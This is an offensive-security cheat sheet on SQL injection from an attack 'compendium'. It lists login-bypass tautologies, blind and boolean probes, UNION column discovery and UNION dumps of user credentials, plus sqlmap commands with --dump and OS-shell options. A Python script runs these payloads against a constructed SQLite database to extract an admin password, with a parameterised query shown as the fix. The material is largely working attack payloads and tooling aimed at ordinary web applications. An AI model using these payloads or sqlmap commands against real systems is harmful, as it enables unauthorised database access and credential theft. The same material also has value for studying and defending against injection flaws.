killchain-compendium/exploit/sqli/sqli.md

SQL Injection

Finding an Opportunity

  • GET parameter
http://example.com/index.php?id=' or 1=1 -- -
  • Provoke error to gain information
http://example.com/index.php?id='

Usage

  • Example: terminate the string with ', make the WHERE clause true with a tautology, and comment out the rest of the query with -- (the injected value is shown inside the resulting query). The and variant only confirms injection without changing the result; the or variant makes the WHERE clause true for every row
SELECT * FROM users WHERE username = 'admin' AND password = '' and 1=1 -- -'
SELECT * FROM users WHERE username = 'admin' AND password = '' or 1=1 --+'
  • Boolean True and False: send one true and one false condition; a different response for each confirms the injection point
SELECT * FROM users WHERE username = 'admin' AND password = '1' or 1 < 2 --+'
SELECT * FROM users WHERE username = 'admin' AND password = '1' or 1 > 2 --+'
  • Blind injection // guess the value one character at a time by comparing its ASCII code with the true/false oracle (MySQL: database(), ascii(), substr())
http://example.com/?id=1' and ascii(substr((select database()),1,1)) < 105 --+

Union based

  • Check number of cols
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# increase until the query stops erroring; the first count without an error is the number of columns
  • Check which one is a string
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
  • Retrieve content: put the data in the column found to accept a string (four columns and the -- // comment style here as an example). Read the database name, or dump a table
' UNION SELECT NULL,NULL,database(),NULL -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
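Worked example for the Usage and Union based sections above. This is added code, not part of the compendium: it builds a throw-away in-memory SQLite database (constructed users and products tables) behind two string-concatenated queries, then runs the page's payloads against them: the ' or 1=1 tautology against a login, the true/false oracle, character-by-character blind extraction with binary search, UNION column-count discovery and a UNION dump of users. Assumptions: SQLite stands in for MySQL, so unicode() replaces ascii() and a hard-coded subquery replaces database(); the "which column is a string" probe is skipped because SQLite is dynamically typed and never errors on it. A parameterised login is included beside the vulnerable one to show the same payload failing.

```python
import sqlite3

# Constructed sample data standing in for the target's database (not real).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'admin','S3cr3t!'), (2,'bob','hunter2');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL, stock INTEGER);
        INSERT INTO products VALUES (1,'widget',9.99,12), (2,'gadget',19.5,0);
    """)
    return con

CON = make_db()

def vulnerable_login(username, password):
    # The 'Usage' query built by concatenation: user input lands inside the quotes.
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return CON.execute(sql).fetchone() is not None

def safe_login(username, password):
    # Parameterised form: the payload is compared as data, never parsed as SQL.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return CON.execute(sql, (username, password)).fetchone() is not None

def vulnerable_product(id_param):
    # Stand-in for index.php?id=...; quoted string context, as the page's payloads assume.
    sql = f"SELECT id, name, price, stock FROM products WHERE id = '{id_param}'"
    return CON.execute(sql).fetchall()

def error_message(id_param):
    # "Provoke error": a verbose page would echo this text back to the attacker.
    try:
        vulnerable_product(id_param)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)

def oracle(condition):
    # Boolean oracle: id=1 exists, so the row comes back iff the condition is true.
    return len(vulnerable_product(f"1' AND ({condition}) -- ")) == 1

def blind_extract(subquery):
    # Blind extraction one character at a time. SQLite has no ascii(); unicode() plays that role.
    length = 0
    while oracle(f"length(({subquery})) > {length}"):
        length += 1
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII; binary search costs about 7 requests per character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

def find_column_count(max_cols=10):
    # ' UNION SELECT NULL,NULL,... -- : the first count that does NOT error is the column count.
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if error_message(f"' UNION SELECT {nulls} -- ") is None:
            return n
    return None

def union_dump_users():
    # Place username/password in two of the discovered columns and read them back.
    n = find_column_count()
    cols = ["NULL"] * n
    cols[1], cols[2] = "username", "password"
    rows = vulnerable_product(f"' UNION SELECT {','.join(cols)} FROM users -- ")
    # Rows from the UNION half carry NULL in the id column; the products half matches nothing.
    return {(r[1], r[2]) for r in rows if r[0] is None}

if __name__ == "__main__":
    print(vulnerable_login("admin", "' or 1=1 -- -"), safe_login("admin", "' or 1=1 -- -"))
    print(error_message("'"))
    print(blind_extract("SELECT password FROM users WHERE username='admin'"))
    print(find_column_count(), union_dump_users())
```

The oracle deliberately anchors on a row that exists (id=1) so that a true condition returns exactly one row and a false one returns none; against a real target the same distinction is made on status code, response length or a marker string rather than on a row count.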

Tools

SQLmap

sqlmap -r request.txt --dbms=mysql --dump
sqlmap -r request.txt --batch

|Parameter|Details|
|---|---|
|-r|Use the intercepted request saved as a file|
|--dbms|DBMS of the target|
|--dump|Dump DBMS database table entries|
|--dump-all|Dump all DBMS databases tables entries|
|-p|Testable parameter(s)|
|--os-shell|Prompt for an interactive operating system shell|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|

Damn Small SQLi Scanner (DSSS)

python dsss.py -u "http://example.com/index.php?id="

Online sqlmap

Payloads